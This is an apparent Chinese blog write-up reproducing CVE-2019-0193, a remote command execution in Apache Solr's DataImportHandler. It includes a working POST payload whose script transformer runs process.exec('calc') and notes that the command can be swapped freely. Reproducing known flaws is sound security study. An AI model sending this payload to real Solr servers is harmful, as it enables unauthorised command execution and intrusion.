CVE-2019-0193:Apache Solr 遠程命令執行漏洞復現

感謝指路:https://www.cnblogs.com/paperpen/p/11328728.html
影響範圍
Apache Solr < 8.2.0
1.先把下載好的文件解壓


2.然後在cmd或powershell中打開,讓應用運行起來

3.查看模塊名稱

4.構造命令執行

# POST內容的主體
command=full-import&verbose=false&clean=false&commit=true&debug=true&core=atom&name=dataimport&dataConfig=
<dataConfig>
<dataSource type="URLDataSource"/>
<script><![CDATA[
function poc(row){
var process= java.lang.Runtime.getRuntime();
process.exec("calc");
return row;
}
]]></script>
<document>
<entity name="stackoverflow"
 url="https://stackoverflow.com/feeds/tag/solr"
 processor="XPathEntityProcessor"
 forEach="/feed"
 transformer="script:poc" />
</document>
</dataConfig>

中間遇到一點小問題,entity這個標籤中每個屬性之間都要有空格,從別人那粘過來的時候沒有空格導致報錯元素類型 * 必須後跟屬性規範 ">" 或 "/>"
5.這樣就彈出了計算器,命令執行成功
命令寫在POST body中的js腳本中process.exec()方法中可以按需修改


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章